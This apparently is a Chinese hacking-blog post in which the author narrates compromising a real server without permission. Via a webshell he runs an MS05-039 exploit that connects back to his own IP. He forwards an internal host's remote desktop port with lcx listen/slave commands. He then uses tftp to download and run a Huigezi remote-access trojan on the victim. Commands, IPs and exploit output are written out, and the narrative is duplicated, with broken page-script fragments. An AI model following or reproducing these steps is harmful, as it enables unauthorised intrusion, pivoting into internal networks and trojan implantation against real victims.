MS05-039+lcx=内网服务器
最近一直为了拿不到服务器而郁闷。自己菜!
上次拿到过两个都是下载pcanywhere里面的cif文件然后用pcanywhere连的。
看了邪恶的原创贴>MS05-039××,然后就学会了。
就马上去Webshell里面测试下。
首先把Ms05039漏洞利用程序传上去。
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
然后选择Wscriptshell程序运算器。点击Wscriptshell
然后Ms05039 127.0.0.1(服务器保留IP) 219.144.177.19 2105(我监听的端口)
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
在本地监听2105端口
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
点击运行
终于反弹成功(看图)
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
别高兴太早了。BT了吧,内网服务器。。。郁闷吧
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
也别泄气啊,这不,我早就把把lcx传到webshell上去了。
××:“lcx是啥啊?
晕,你连xingxuexin老大的动画都不看,咋混啊?
第八课里面讲得够仔细了。。。
先在本地监听51转8899 lcx -listen 51 8899
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
。××:"为啥是8899啊?"它的远程终端是8899哦
然后到在cmdshell下面运行lcx -slave 219.144.177.19 51 172.16.2.10 8899
这条命令的意思是将内网肉鸡的8899端口转发到本机的51上来。
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
然后敲击回车,打开MSTSC.EXE连接本机8899端口。
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
看到没有连接上了
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
由于服务器是网通的,还是内网的,汗×
所以远程桌面卡得很
本来架设ftp呢!连接后假死状态。然后经过xingxuexin老大的执教,
就架设了tftp
然后在cmdshell下面运行tftp -i 我的IP get 灰鸽子服务端.exe
等了半个小时吧,服务端传完了。
然后运行了..............
然后老大吩咐我做动画,乖乖我的CPU1.7内网256,估计整不了啊。
准备做动画的突然发现ms05039反弹不了了。
[+] Trying to connect to remote port on127.0.0.1:445...ESTABLISHED
[+] Making null session...
[!] Failed to get responding data
不知道为啥?
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
郁闷啊,后来发现管理员没在啊,应该。郁闷ing
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0 resized="true">
这次拿服务器算是完成篇吧
很简单的,没什么技术的,应该一看就会了。吧。。。
就到这里了。。。。希望大家技术>Beter and Beter
上次拿到过两个都是下载pcanywhere里面的cif文件然后用pcanywhere连的。
看了邪恶的原创贴>MS05-039××,然后就学会了。
就马上去Webshell里面测试下。
首先把Ms05039漏洞利用程序传上去。
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>然后选择Wscriptshell程序运算器。点击Wscriptshell
然后Ms05039 127.0.0.1(服务器保留IP) 219.144.177.19 2105(我监听的端口)
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>在本地监听2105端口
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>点击运行
终于反弹成功(看图)
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>别高兴太早了。BT了吧,内网服务器。。。郁闷吧
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>也别泄气啊,这不,我早就把把lcx传到webshell上去了。
××:“lcx是啥啊?
晕,你连xingxuexin老大的动画都不看,咋混啊?
第八课里面讲得够仔细了。。。
先在本地监听51转8899 lcx -listen 51 8899
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>。××:"为啥是8899啊?"它的远程终端是8899哦
然后到在cmdshell下面运行lcx -slave 219.144.177.19 51 172.16.2.10 8899
这条命令的意思是将内网肉鸡的8899端口转发到本机的51上来。
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>然后敲击回车,打开MSTSC.EXE连接本机8899端口。
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>看到没有连接上了
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>由于服务器是网通的,还是内网的,汗×
所以远程桌面卡得很
本来架设ftp呢!连接后假死状态。然后经过xingxuexin老大的执教,
就架设了tftp
然后在cmdshell下面运行tftp -i 我的IP get 灰鸽子服务端.exe
等了半个小时吧,服务端传完了。
然后运行了..............
然后老大吩咐我做动画,乖乖我的CPU1.7内网256,估计整不了啊。
准备做动画的突然发现ms05039反弹不了了。
[+] Trying to connect to remote port on127.0.0.1:445...ESTABLISHED
[+] Making null session...
[!] Failed to get responding data
不知道为啥?
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>郁闷啊,后来发现管理员没在啊,应该。郁闷ing
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0 resized="true">这次拿服务器算是完成篇吧
很简单的,没什么技术的,应该一看就会了。吧。。。
就到这里了。。。。希望大家技术>Beter and Beter
相关阅读:
- AD服务器启动慢|srv2000 (服务器管理-win2, 2008-9-04)
- DC报错EVENT ID13|ca证书服务器自动注册 (服务器管理-win2, 2008-9-04)
- dns服务器重建恢复|dns4521 (服务器管理-win2, 2008-9-04)
- dns服务器重建恢复|dns4521 (服务器管理-win2, 2008-9-04)
- 信任域错误:RPC服务器不可用 (服务器管理-win2, 2008-9-04)
- 区域不是由DNS服务器加载|修复dns区域 (服务器管理-win2, 2008-9-04)
- Windows2003DNS服务器如何解析Internet 域名|dns转发器设置 (服务器管理-win2, 2008-9-04)
- 域环境配置ISA2006企业版存储服务器及NLB之一配置存储服务器 (rickyfang, 2008-9-04)
- 源服务器目前拒绝服务请求|dssite.msc手动强制同步活动目录 (服务器管理-win2, 2008-9-04)
- 打造SSL安全加密的FTP服务器 (妖界之箭, 2008-9-07)
导入论坛 引用链接 收藏 分享给好友 推荐到圈子 管理 举报
标题搜索
我的存档
数据统计
- 访问量: 60106
- 日志数: 1147
- 文件数: 1
- 建立时间: 2007-08-10
- 更新时间: 2008-12-25
